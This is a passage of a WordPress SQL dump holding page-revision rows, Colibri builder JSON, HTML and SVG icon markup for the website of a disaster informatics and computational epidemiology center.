style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c20\">\n                <!---->\n                <!---->\n                <h5 class=\"\">Impact assessment</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-05-03 13:33:37','2022-05-03 17:33:37','',20,'https://gsudice.dataconn.net/?p=1318',0,'revision','',0),(1319,1,'2022-05-03 13:33:37','2022-05-03 17:33:37','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/our-mission\\/\"}}},{\"name\":\"hop-button\",\"parentId\":\"22-h29\",\"id\":\"22-h39\",\"partialId\":22,\"styleRef\":679,\"type\":\"header\",\"props\":{\"text\":\"Learn more\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h29\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h33\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h37\",\"parentId\":\"22-h36\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h38\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-05-03 13:33:37','2022-05-03 17:33:37','',23,'https://gsudice.dataconn.net/?p=1319',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1320,1,'2022-05-03 13:33:38','2022-05-03 17:33:38','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path 